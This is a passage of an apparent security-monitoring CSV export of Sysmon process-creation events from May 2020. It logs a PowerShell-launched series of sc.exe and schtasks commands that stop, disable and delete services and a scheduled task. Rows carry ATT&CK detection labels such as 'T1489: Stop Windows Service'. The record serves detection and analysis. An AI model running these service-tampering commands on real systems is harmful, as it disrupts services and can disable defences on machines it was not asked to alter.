C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.105"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001071b11900}"",""processId"":""3308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.759",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.077 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010dfaf1900} +ProcessId: 7244 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.079532500Z"",""eventRecordID"":""2201"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.077\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010dfaf1900}\r\nProcessId: 7244\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.077"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010dfaf1900}"",""processId"":""7244"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.712",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:49:36.046 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001085ad1900} +ProcessId: 8152 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.047903600Z"",""eventRecordID"":""2198"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.046\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001085ad1900}\r\nProcessId: 8152\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.046"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001085ad1900}"",""processId"":""8152"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 
-s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.696",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.034 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010bcac1900} +ProcessId: 8124 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHasdelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.036887900Z"",""eventRecordID"":""2197"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.034\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010bcac1900}\r\nProcessId: 8124\r\nImage: 
C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.034"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010bcac1900}"",""processId"":""8124"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHasdelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.665",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.015 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-00102bab1900} +ProcessId: 8076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.016870200Z"",""eventRecordID"":""2195"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.015\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-00102bab1900}\r\nProcessId: 8076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.015"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-00102bab1900}"",""processId"":""8076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.619",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.984 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010cfa81900} +ProcessId: 7996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.986243000Z"",""eventRecordID"":""2192"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.984\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010cfa81900}\r\nProcessId: 7996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:35.984"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010cfa81900}"",""processId"":""7996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.588",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.964 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00103ca71900} +ProcessId: 7940 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.967683600Z"",""eventRecordID"":""2190"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.964\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00103ca71900}\r\nProcessId: 7940\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
